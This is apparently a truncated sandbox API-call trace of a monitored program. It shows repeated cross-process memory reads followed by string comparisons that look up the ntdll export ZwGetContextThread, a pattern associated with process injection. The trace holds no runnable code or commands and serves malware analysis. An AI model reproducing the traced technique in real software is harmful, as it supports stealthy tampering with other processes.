0x0 [0130.939] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b86000, Buffer=0x7ffb, BufferSize=0xb16000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.939] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b87000, Buffer=0x7ffb, BufferSize=0xb17000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.939] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b88000, Buffer=0x7ffb, BufferSize=0xb18000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.939] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b89000, Buffer=0x7ffb, BufferSize=0xb19000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.940] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8a000, Buffer=0x7ffb, BufferSize=0xb1a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.940] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8b000, Buffer=0x7ffb, BufferSize=0xb1b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.940] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8c000, Buffer=0x7ffb, BufferSize=0xb1c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.941] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8d000, Buffer=0x7ffb, BufferSize=0xb1d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.941] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8e000, Buffer=0x7ffb, BufferSize=0xb1e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.941] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8f000, Buffer=0x7ffb, BufferSize=0xb1f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.941] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b90000, Buffer=0x7ffb, BufferSize=0xb20000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.942] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b91000, Buffer=0x7ffb, BufferSize=0xb21000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.942] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b92000, Buffer=0x7ffb, BufferSize=0xb22000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.942] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b93000, Buffer=0x7ffb, BufferSize=0xb23000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.943] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b94000, Buffer=0x7ffb, BufferSize=0xb24000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.943] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b95000, Buffer=0x7ffb, BufferSize=0xb25000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.943] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b96000, Buffer=0x7ffb, BufferSize=0xb26000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.943] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b97000, Buffer=0x7ffb, BufferSize=0xb27000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.944] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b98000, Buffer=0x7ffb, BufferSize=0xb28000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.944] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b99000, Buffer=0x7ffb, BufferSize=0xb29000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.944] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9a000, Buffer=0x7ffb, BufferSize=0xb2a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.944] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9b000, Buffer=0x7ffb, BufferSize=0xb2b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.944] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9c000, Buffer=0x7ffb, BufferSize=0xb2c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.945] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9d000, Buffer=0x7ffb, BufferSize=0xb2d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.945] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9e000, Buffer=0x7ffb, BufferSize=0xb2e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.945] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9f000, Buffer=0x7ffb, BufferSize=0xb2f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.945] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba0000, Buffer=0x7ffb, BufferSize=0xb30000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.946] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba1000, Buffer=0x7ffb, BufferSize=0xb31000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.946] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba2000, Buffer=0x7ffb, BufferSize=0xb32000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.946] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba3000, Buffer=0x7ffb, BufferSize=0xb33000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.947] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba4000, Buffer=0x7ffb, BufferSize=0xb34000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.947] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba5000, Buffer=0x7ffb, BufferSize=0xb35000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.947] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba6000, Buffer=0x7ffb, BufferSize=0xb36000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.947] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba7000, Buffer=0x7ffb, BufferSize=0xb37000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.947] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba8000, Buffer=0x7ffb, BufferSize=0xb38000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.948] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba9000, Buffer=0x7ffb, BufferSize=0xb39000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.948] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baa000, Buffer=0x7ffb, BufferSize=0xb3a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.948] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bab000, Buffer=0x7ffb, BufferSize=0xb3b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.948] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bac000, Buffer=0x7ffb, BufferSize=0xb3c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.948] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bad000, Buffer=0x7ffb, BufferSize=0xb3d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.949] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bae000, Buffer=0x7ffb, BufferSize=0xb3e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.949] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baf000, Buffer=0x7ffb, BufferSize=0xb3f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.949] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb0000, Buffer=0x7ffb, BufferSize=0xb40000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.949] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb1000, Buffer=0x7ffb, BufferSize=0xb41000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.950] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb2000, Buffer=0x7ffb, BufferSize=0xb42000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.950] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb3000, Buffer=0x7ffb, BufferSize=0xb43000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.951] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb4000, Buffer=0x7ffb, BufferSize=0xb44000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.951] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb5000, Buffer=0x7ffb, BufferSize=0xb45000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.951] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb6000, Buffer=0x7ffb, BufferSize=0xb46000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.951] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb7000, Buffer=0x7ffb, BufferSize=0xb47000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.952] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb8000, Buffer=0x7ffb, BufferSize=0xb48000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.952] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb9000, Buffer=0x7ffb, BufferSize=0xb49000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.952] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bba000, Buffer=0x7ffb, BufferSize=0xb4a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.953] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbb000, Buffer=0x7ffb, BufferSize=0xb4b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.953] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbc000, Buffer=0x7ffb, BufferSize=0xb4c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.953] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbd000, Buffer=0x7ffb, BufferSize=0xb4d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.954] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbe000, Buffer=0x7ffb, BufferSize=0xb4e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.954] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbf000, Buffer=0x7ffb, BufferSize=0xb4f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.954] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc0000, Buffer=0x7ffb, BufferSize=0xb50000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.955] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc1000, Buffer=0x7ffb, BufferSize=0xb51000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.955] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc2000, Buffer=0x7ffb, BufferSize=0xb52000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.955] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc3000, Buffer=0x7ffb, BufferSize=0xb53000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.955] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc4000, Buffer=0x7ffb, BufferSize=0xb54000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.956] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc5000, Buffer=0x7ffb, BufferSize=0xb55000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.956] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc6000, Buffer=0x7ffb, BufferSize=0xb56000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.956] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc7000, Buffer=0x7ffb, BufferSize=0xb57000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.957] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc8000, Buffer=0x7ffb, BufferSize=0xb58000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.957] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc9000, Buffer=0x7ffb, BufferSize=0xb59000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.957] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bca000, Buffer=0x7ffb, BufferSize=0xb5a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.957] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcb000, Buffer=0x7ffb, BufferSize=0xb5b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.958] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcc000, Buffer=0x7ffb, BufferSize=0xb5c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.958] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcd000, Buffer=0x7ffb, BufferSize=0xb5d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.958] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bce000, Buffer=0x7ffb, BufferSize=0xb5e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.959] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcf000, Buffer=0x7ffb, BufferSize=0xb5f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.959] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd0000, Buffer=0x7ffb, BufferSize=0xb60000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.959] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd1000, Buffer=0x7ffb, BufferSize=0xb61000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.959] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd2000, Buffer=0x7ffb, BufferSize=0xb62000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.960] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd3000, Buffer=0x7ffb, BufferSize=0xb63000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.960] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd4000, Buffer=0x7ffb, BufferSize=0xb64000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.960] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd5000, Buffer=0x7ffb, BufferSize=0xb65000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.961] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd6000, Buffer=0x7ffb, BufferSize=0xb66000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.961] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd7000, Buffer=0x7ffb, BufferSize=0xb67000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.961] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd8000, Buffer=0x7ffb, BufferSize=0xb68000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.961] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd9000, Buffer=0x7ffb, BufferSize=0xb69000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.962] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bda000, Buffer=0x7ffb, BufferSize=0xb6a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.962] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdb000, Buffer=0x7ffb, BufferSize=0xb6b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.962] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdc000, Buffer=0x7ffb, BufferSize=0xb6c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.963] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdd000, Buffer=0x7ffb, BufferSize=0xb6d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.963] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bde000, Buffer=0x7ffb, BufferSize=0xb6e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.963] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdf000, Buffer=0x7ffb, BufferSize=0xb6f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.964] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be0000, Buffer=0x7ffb, BufferSize=0xb70000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.964] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be1000, Buffer=0x7ffb, BufferSize=0xb71000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.964] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be2000, Buffer=0x7ffb, BufferSize=0xb72000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.965] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be3000, Buffer=0x7ffb, BufferSize=0xb73000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.965] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be4000, Buffer=0x7ffb, BufferSize=0xb74000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.965] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be5000, Buffer=0x7ffb, BufferSize=0xb75000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0131.616] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwGetContextThread") returned -1 [0131.616] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwGetContextThread") returned -1 [0131.617] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgPrint", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwGetContextThread") returned -1 [0131.618] lstrcmpA 